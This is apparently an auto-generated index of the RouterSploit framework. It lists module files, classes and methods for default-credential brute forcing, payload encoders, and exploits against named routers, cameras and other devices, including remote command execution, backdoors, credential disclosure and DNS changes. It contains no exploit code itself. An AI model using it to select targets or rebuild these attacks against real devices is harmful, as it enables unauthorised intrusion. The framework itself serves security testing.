FILE: routersploit/modules/creds/routers/cisco/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/comtrend/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/comtrend/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/comtrend/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/dlink/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/dlink/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/dlink/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/fortinet/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/fortinet/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/fortinet/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/huawei/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/huawei/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/huawei/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/ipfire/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/ipfire/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/ipfire/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/juniper/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/juniper/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/juniper/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/linksys/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/linksys/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/linksys/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py
class Exploit (line 9) | class Exploit(TCPClient):
method run (line 32) | def run(self):
method attack (line 37) | def attack(self):
method login (line 53) | def login(self, username, password):
method target_function (line 85) | def target_function(self, running, creds):
method check (line 104) | def check(self):
method check_default (line 112) | def check_default(self):
FILE: routersploit/modules/creds/routers/mikrotik/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/mikrotik/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/mikrotik/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/movistar/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/movistar/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/movistar/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/netcore/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/netcore/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/netcore/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/netgear/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/netgear/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/netgear/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/netsys/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/netsys/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/netsys/telnet_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/pfsense/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/pfsense/webinterface_http_form_default_creds.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 27) | def run(self):
method attack (line 32) | def attack(self):
method target_function (line 47) | def target_function(self, data):
method check (line 50) | def check(self):
method check_default (line 63) | def check_default(self):
FILE: routersploit/modules/creds/routers/technicolor/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/technicolor/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/technicolor/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/thomson/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/thomson/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/thomson/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/tplink/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/tplink/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/tplink/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/ubiquiti/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/ubiquiti/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/ubiquiti/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/zte/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/zte/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/zte/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/creds/routers/zyxel/ftp_default_creds.py
class Exploit (line 5) | class Exploit(FTPDefault):
FILE: routersploit/modules/creds/routers/zyxel/ssh_default_creds.py
class Exploit (line 5) | class Exploit(SSHDefault):
FILE: routersploit/modules/creds/routers/zyxel/telnet_default_creds.py
class Exploit (line 5) | class Exploit(TelnetDefault):
FILE: routersploit/modules/encoders/perl/base64.py
class Encoder (line 6) | class Encoder(BaseEncoder):
method encode (line 17) | def encode(self, payload):
FILE: routersploit/modules/encoders/perl/hex.py
class Encoder (line 5) | class Encoder(BaseEncoder):
method encode (line 16) | def encode(self, payload):
FILE: routersploit/modules/encoders/php/base64.py
class Encoder (line 6) | class Encoder(BaseEncoder):
method encode (line 17) | def encode(self, payload):
FILE: routersploit/modules/encoders/php/hex.py
class Encoder (line 6) | class Encoder(BaseEncoder):
method encode (line 17) | def encode(self, payload):
FILE: routersploit/modules/encoders/python/base64.py
class Encoder (line 6) | class Encoder(BaseEncoder):
method encode (line 17) | def encode(self, payload):
FILE: routersploit/modules/encoders/python/hex.py
class Encoder (line 5) | class Encoder(BaseEncoder):
method encode (line 16) | def encode(self, payload):
FILE: routersploit/modules/exploits/cameras/acti/acm_5611_rce.py
class Exploit (line 7) | class Exploit(HTTPClient):
method execute (line 33) | def execute(self, cmd: str) -> str:
method check (line 44) | def check(self) -> bool:
method run (line 52) | def run(self):
FILE: routersploit/modules/exploits/cameras/avigilon/videoiq_camera_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 27) | def run(self):
method check (line 55) | def check(self):
FILE: routersploit/modules/exploits/cameras/beward/n100_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method execute (line 27) | def execute(self, cmd: str) -> str:
method check (line 42) | def check(self) -> bool:
method run (line 49) | def run(self):
FILE: routersploit/modules/exploits/cameras/brickcom/corp_network_cameras_conf_disclosure.py
class Exploit (line 5) | class Exploit(HTTPClient):
method __init__ (line 38) | def __init__(self):
method run (line 49) | def run(self):
method check (line 66) | def check(self):
FILE: routersploit/modules/exploits/cameras/brickcom/users_cgi_creds_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method __init__ (line 34) | def __init__(self):
method run (line 43) | def run(self):
method check (line 52) | def check(self):
FILE: routersploit/modules/exploits/cameras/cisco/video_surv_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 27) | def run(self):
method check (line 46) | def check(self):
FILE: routersploit/modules/exploits/cameras/dlink/dcs_930l_932l_auth_bypass.py
class Exploit (line 6) | class Exploit(HTTPClient):
method __init__ (line 28) | def __init__(self):
method run (line 31) | def run(self):
method check (line 60) | def check(self):
method _deobfuscate (line 74) | def _deobfuscate(self, config):
FILE: routersploit/modules/exploits/cameras/geuterbruck/efd_2250.py
class Exploit (line 5) | class Exploit(HTTPClient):
method execute (line 34) | def execute(self, cmd: str) -> str:
method check (line 42) | def check(self) -> bool:
method run (line 56) | def run(self):
FILE: routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor.py
class Exploit (line 5) | class Exploit(TelnetClient):
method run (line 29) | def run(self):
method check (line 54) | def check(self):
FILE: routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli.py
class Exploit (line 5) | class Exploit(TelnetClient):
method run (line 26) | def run(self):
method check (line 54) | def check(self):
FILE: routersploit/modules/exploits/cameras/honeywell/hicc_1100pt_password_disclosure.py
class Exploit (line 5) | class Exploit(HTTPClient):
method __init__ (line 25) | def __init__(self):
method run (line 28) | def run(self):
method check (line 36) | def check(self):
FILE: routersploit/modules/exploits/cameras/jovision/jovision_credentials_disclosure.py
class Exploit (line 7) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method check (line 65) | def check(self):
FILE: routersploit/modules/exploits/cameras/multi/P2P_wificam_credential_disclosure.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 1276) | def run(self):
method check (line 1326) | def check(self):
FILE: routersploit/modules/exploits/cameras/multi/P2P_wificam_rce.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 1281) | def run(self):
method execute (line 1290) | def execute(self, cmd):
method check (line 1351) | def check(self):
FILE: routersploit/modules/exploits/cameras/multi/cctv_dvr_rce.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 105) | def run(self):
method check (line 150) | def check(self):
FILE: routersploit/modules/exploits/cameras/multi/dvr_creds_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method __init__ (line 38) | def __init__(self):
method run (line 41) | def run(self):
method check (line 51) | def check(self):
FILE: routersploit/modules/exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method __init__ (line 30) | def __init__(self):
method run (line 38) | def run(self):
method check (line 63) | def check(self):
FILE: routersploit/modules/exploits/cameras/multi/netwave_ip_camera_information_disclosure.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 25) | def run(self):
method check (line 66) | def check(self):
FILE: routersploit/modules/exploits/cameras/mvpower/dvr_jaws_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 29) | def run(self):
method execute (line 36) | def execute(self, cmd):
method check (line 49) | def check(self):
FILE: routersploit/modules/exploits/cameras/siemens/cvms2025_credentials_disclosure.py
class Exploit (line 5) | class Exploit(HTTPClient):
method __init__ (line 26) | def __init__(self):
method run (line 29) | def run(self):
method check (line 38) | def check(self):
FILE: routersploit/modules/exploits/cameras/xiongmai/uc_httpd_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method check (line 52) | def check(self):
FILE: routersploit/modules/exploits/generic/heartbleed.py
class Exploit (line 12) | class Exploit(TCPClient):
method __init__ (line 127) | def __init__(self):
method run (line 134) | def run(self):
method check (line 162) | def check(self):
method bleed (line 168) | def bleed(self):
method establish_connect (line 197) | def establish_connect(self):
method get_server_hello (line 211) | def get_server_hello(self):
method parse_handshakes (line 239) | def parse_handshakes(self, data):
method parse_server_hello (line 274) | def parse_server_hello(self, data):
method parse_certificate_data (line 286) | def parse_certificate_data(self, data):
method get_ssl_record (line 306) | def get_ssl_record(self):
method client_hello (line 318) | def client_hello(self):
method heartbeat_request (line 345) | def heartbeat_request(self, length):
method ssl_record (line 350) | def ssl_record(self, record_type, data):
FILE: routersploit/modules/exploits/generic/shellshock.py
class Exploit (line 7) | class Exploit(HTTPClient):
method __init__ (line 30) | def __init__(self):
method run (line 37) | def run(self):
method execute (line 45) | def execute(self, cmd):
method check (line 71) | def check(self):
FILE: routersploit/modules/exploits/generic/ssh_auth_keys.py
class Exploit (line 7) | class Exploit(SSHClient):
method __init__ (line 50) | def __init__(self):
method run (line 68) | def run(self):
method check (line 81) | def check(self):
FILE: routersploit/modules/exploits/misc/asus/b1m_projector_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 25) | def run(self):
method execute (line 33) | def execute(self, cmd):
method check (line 47) | def check(self):
FILE: routersploit/modules/exploits/misc/miele/pg8528_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method check (line 49) | def check(self):
FILE: routersploit/modules/exploits/misc/watchguard/xcs_9_rce.py
class Exploit (line 9) | class Exploit(HTTPClient):
method run (line 42) | def run(self):
method check (line 71) | def check(self):
method attempt_login (line 84) | def attempt_login(self, username, pwd_clear):
method add_user (line 132) | def add_user(self, user_id, username, pwd_hash, pwd_clear):
method generate_device_hash (line 157) | def generate_device_hash(self, cleartext_password):
method send_cmd_exec (line 165) | def send_cmd_exec(self, uri, os_cmd):
method get_session (line 181) | def get_session(self):
method execute (line 206) | def execute(self, cmd):
FILE: routersploit/modules/exploits/misc/wepresent/wipg1000_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 25) | def run(self):
method execute (line 33) | def execute(self, cmd):
method check (line 50) | def check(self):
FILE: routersploit/modules/exploits/routers/2wire/4011g_5012nv_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method check (line 58) | def check(self):
FILE: routersploit/modules/exploits/routers/2wire/gateway_auth_bypass.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 27) | def run(self):
method check (line 36) | def check(self):
FILE: routersploit/modules/exploits/routers/3com/ap8760_password_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 26) | def run(self):
method check (line 50) | def check(self):
FILE: routersploit/modules/exploits/routers/3com/imc_info_disclosure.py
class Exploit (line 5) | class Exploit(HTTPClient):
method __init__ (line 24) | def __init__(self):
method run (line 33) | def run(self):
method check (line 56) | def check(self):
FILE: routersploit/modules/exploits/routers/3com/imc_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 27) | def run(self):
method check (line 49) | def check(self):
FILE: routersploit/modules/exploits/routers/3com/officeconnect_info_disclosure.py
class Exploit (line 5) | class Exploit(HTTPClient):
method __init__ (line 27) | def __init__(self):
method run (line 37) | def run(self):
method check (line 55) | def check(self):
FILE: routersploit/modules/exploits/routers/3com/officeconnect_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 25) | def run(self):
method execute (line 49) | def execute(self, cmd):
method check (line 59) | def check(self):
FILE: routersploit/modules/exploits/routers/asmax/ar_1004g_password_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 25) | def run(self):
method check (line 56) | def check(self):
FILE: routersploit/modules/exploits/routers/asmax/ar_804_gu_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 26) | def run(self):
method execute (line 36) | def execute(self, cmd):
method check (line 49) | def check(self):
FILE: routersploit/modules/exploits/routers/asus/asuswrt_lan_rce.py
class Exploit (line 7) | class Exploit(HTTPClient, UDPClient):
method run (line 37) | def run(self):
method execute (line 52) | def execute(self, cmd):
method check (line 82) | def check(self):
FILE: routersploit/modules/exploits/routers/asus/infosvr_backdoor_rce.py
class Exploit (line 6) | class Exploit(UDPClient):
method run (line 37) | def run(self):
method execute (line 47) | def execute(self, cmd):
method check (line 81) | def check(self):
FILE: routersploit/modules/exploits/routers/asus/rt_n16_password_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 30) | def run(self):
method check (line 49) | def check(self):
FILE: routersploit/modules/exploits/routers/belkin/auth_bypass.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 30) | def run(self):
method check (line 60) | def check(self):
FILE: routersploit/modules/exploits/routers/belkin/g_n150_password_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method check (line 48) | def check(self):
FILE: routersploit/modules/exploits/routers/belkin/g_plus_info_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 27) | def run(self):
method check (line 64) | def check(self):
FILE: routersploit/modules/exploits/routers/belkin/n150_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 32) | def run(self):
method check (line 52) | def check(self):
FILE: routersploit/modules/exploits/routers/belkin/n750_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 26) | def run(self):
method execute (line 34) | def execute(self, cmd):
method check (line 50) | def check(self):
FILE: routersploit/modules/exploits/routers/belkin/play_max_prce.py
class Exploit (line 6) | class Exploit(HTTPClient):
method auth_bypass (line 27) | def auth_bypass(self):
method inject_command (line 57) | def inject_command(self):
method run (line 97) | def run(self):
method check (line 102) | def check(self):
FILE: routersploit/modules/exploits/routers/bhu/bhu_urouter_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 24) | def run(self):
method execute (line 36) | def execute(self, cmd):
method check (line 48) | def check(self):
FILE: routersploit/modules/exploits/routers/billion/billion_5200w_rce.py
class Exploit (line 6) | class Exploit(HTTPClient, TelnetClient):
method __init__ (line 33) | def __init__(self):
method run (line 41) | def run(self):
method execute1 (line 56) | def execute1(self, cmd):
method execute2 (line 78) | def execute2(self, cmd):
method check (line 143) | def check(self):
FILE: routersploit/modules/exploits/routers/billion/billion_7700nr4_password_disclosure.py
class Exploit (line 7) | class Exploit(HTTPClient):
method run (line 30) | def run(self):
method check (line 61) | def check(self):
FILE: routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
class Exploit (line 6) | class Exploit(TCPClient, TelnetClient):
method __init__ (line 34) | def __init__(self):
method run (line 163) | def run(self):
method build_payload (line 207) | def build_payload(self):
method check (line 215) | def check(self):
FILE: routersploit/modules/exploits/routers/cisco/dpc2420_info_disclosure.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 25) | def run(self):
method check (line 40) | def check(self):
FILE: routersploit/modules/exploits/routers/cisco/firepower_management60_path_traversal.py
class Exploit (line 6) | class Exploit(HTTPClient):
method __init__ (line 32) | def __init__(self):
method run (line 35) | def run(self):
method check (line 69) | def check(self):
method login (line 80) | def login(self):
FILE: routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py
class Exploit (line 8) | class Exploit(HTTPClient, SSHClient):
method __init__ (line 39) | def __init__(self):
method run (line 42) | def run(self):
method check (line 63) | def check(self):
method login (line 76) | def login(self):
method create_ssh_backdoor (line 103) | def create_ssh_backdoor(self, username, password):
method get_sf_action_id (line 128) | def get_sf_action_id(self):
method init_ssh_session (line 147) | def init_ssh_session(self, username, password):
FILE: routersploit/modules/exploits/routers/cisco/ios_http_authorization_bypass.py
class Exploit (line 6) | class Exploit(HTTPClient):
method __init__ (line 28) | def __init__(self):
method run (line 31) | def run(self):
method check (line 50) | def check(self):
FILE: routersploit/modules/exploits/routers/cisco/rv320_command_injection.py
class Exploit (line 7) | class Exploit(HTTPClient):
method run (line 32) | def run(self):
method get_config (line 51) | def get_config(self):
method extract_creds (line 62) | def extract_creds(self, config):
method extract_auth_key (line 82) | def extract_auth_key(self, session):
method cisco_login (line 96) | def cisco_login(self, username, password):
method pwn (line 140) | def pwn(self, session, command):
method check (line 174) | def check(self):
FILE: routersploit/modules/exploits/routers/cisco/secure_acs_bypass.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 34) | def run(self):
method check (line 77) | def check(self):
FILE: routersploit/modules/exploits/routers/cisco/ucm_info_disclosure.py
class Exploit (line 5) | class Exploit(UDPClient):
method __init__ (line 26) | def __init__(self):
method run (line 29) | def run(self):
method check (line 46) | def check(self):
FILE: routersploit/modules/exploits/routers/cisco/ucs_manager_rce.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 27) | def run(self):
method execute (line 35) | def execute(self, cmd):
method check (line 59) | def check(self):
FILE: routersploit/modules/exploits/routers/cisco/unified_multi_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 35) | def run(self):
method check (line 55) | def check(self):
FILE: routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py
class Exploit (line 7) | class Exploit(HTTPClient):
method run (line 25) | def run(self):
method check (line 59) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dcs_930l_auth_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 27) | def run(self):
method execute (line 36) | def execute(self, cmd):
method check (line 56) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dgs_1510_add_user.py
class Exploit (line 9) | class Exploit(HTTPClient):
method __init__ (line 39) | def __init__(self):
method decompress (line 42) | def decompress(self, content, encoding):
method extract_users (line 56) | def extract_users(self, content):
method run (line 60) | def run(self):
method check (line 111) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dir_300_320_600_615_info_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 30) | def run(self):
method check (line 48) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dir_300_320_615_auth_bypass.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method check (line 39) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dir_300_600_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method execute (line 36) | def execute(self, cmd):
method check (line 52) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
class Exploit (line 5) | class Exploit(UDPClient):
method run (line 28) | def run(self):
method execute (line 37) | def execute(self, cmd):
method check (line 55) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dir_645_815_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 32) | def run(self):
method execute (line 41) | def execute(self, cmd):
method check (line 56) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dir_645_password_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 25) | def run(self):
method check (line 52) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dir_655_866_652_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 42) | def run(self):
method execute (line 51) | def execute(self, cmd):
method check (line 75) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
class Exploit (line 5) | class Exploit(UDPClient):
method run (line 26) | def run(self):
method execute (line 32) | def execute(self, cmd):
method check (line 50) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dir_825_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method check (line 64) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dir_850l_creds_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method check (line 38) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dir_8xx_password_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 29) | def run(self):
method check (line 39) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dns_320l_327l_rce.py
class Exploit (line 7) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method execute (line 36) | def execute(self, cmd):
method check (line 57) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dsl_2640b_dns_change.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 29) | def run(self):
method check (line 50) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dsl_2730_2750_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 29) | def run(self):
method check (line 50) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 31) | def run(self):
method check (line 52) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dsl_2740r_dns_change.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 29) | def run(self):
method check (line 50) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dsl_2750b_info_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method check (line 54) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dsl_2750b_rce.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 26) | def run(self):
method execute (line 31) | def execute(self, cmd):
method check (line 39) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 25) | def run(self):
method execute (line 35) | def execute(self, cmd):
method check (line 51) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dvg_n5402sp_path_traversal.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method check (line 60) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dwl_3200ap_password_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 28) | def run(self):
method check (line 43) | def check(self):
method get_cookie (line 49) | def get_cookie(self):
method test_cookie (line 66) | def test_cookie(self, cookie_int):
FILE: routersploit/modules/exploits/routers/dlink/dwr_932_info_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 26) | def run(self):
method check (line 55) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
class Exploit (line 6) | class Exploit(UDPClient, TelnetClient):
method run (line 26) | def run(self):
method check (line 39) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 30) | def run(self):
method execute (line 38) | def execute(self, cmd):
method check (line 76) | def check(self):
FILE: routersploit/modules/exploits/routers/dlink/multi_hnap_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 40) | def run(self):
method execute (line 49) | def execute(self, cmd):
method check (line 62) | def check(self):
FILE: routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
class Exploit (line 9) | class Exploit(SSHClient):
method run (line 31) | def run(self):
method check (line 62) | def check(self):
method custom_handler (line 88) | def custom_handler(self, title, instructions, prompt_list):
FILE: routersploit/modules/exploits/routers/huawei/e5331_mifi_info_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method __init__ (line 26) | def __init__(self):
method run (line 30) | def run(self):
method check (line 51) | def check(self):
FILE: routersploit/modules/exploits/routers/huawei/hg520_info_disclosure.py
class Exploit (line 5) | class Exploit(UDPClient):
method __init__ (line 25) | def __init__(self):
method run (line 66) | def run(self):
method check (line 74) | def check(self):
FILE: routersploit/modules/exploits/routers/huawei/hg530_hg520b_password_disclosure.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 27) | def run(self):
method check (line 60) | def check(self):
FILE: routersploit/modules/exploits/routers/huawei/hg532_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 29) | def run(self):
method execute (line 37) | def execute(self, cmd):
method check (line 49) | def check(self):
FILE: routersploit/modules/exploits/routers/huawei/hg866_password_change.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 27) | def run(self):
method check (line 50) | def check(self):
FILE: routersploit/modules/exploits/routers/ipfire/ipfire_oinkcode_rce.py
class Exploit (line 6) | class Exploit(HTTPClient):
method run (line 30) | def run(self):
method execute (line 41) | def execute(self, cmd):
method check (line 68) | def check(self):
FILE: routersploit/modules/exploits/routers/ipfire/ipfire_proxy_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 30) | def run(self):
method execute (line 41) | def execute(self, cmd):
method check (line 76) | def check(self):
FILE: routersploit/modules/exploits/routers/ipfire/ipfire_shellshock.py
class Exploit (line 5) | class Exploit(HTTPClient):
method __init__ (line 29) | def __init__(self):
method run (line 32) | def run(self):
method execute (line 40) | def execute(self, cmd):
method check (line 67) | def check(self):
FILE: routersploit/modules/exploits/routers/lg/nas_3718.py
class Exploit (line 7) | class Exploit(HTTPClient):
method check (line 28) | def check(self) -> bool:
method execute (line 45) | def execute(self, cmd: str) -> str:
method run (line 55) | def run(self):
FILE: routersploit/modules/exploits/routers/linksys/1500_2500_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 29) | def run(self):
method execute (line 38) | def execute(self, cmd):
method check (line 61) | def check(self):
FILE: routersploit/modules/exploits/routers/linksys/eseries_themoon_rce.py
class Exploit (line 5) | class Exploit(HTTPClient):
method run (line 46) | def run(self):
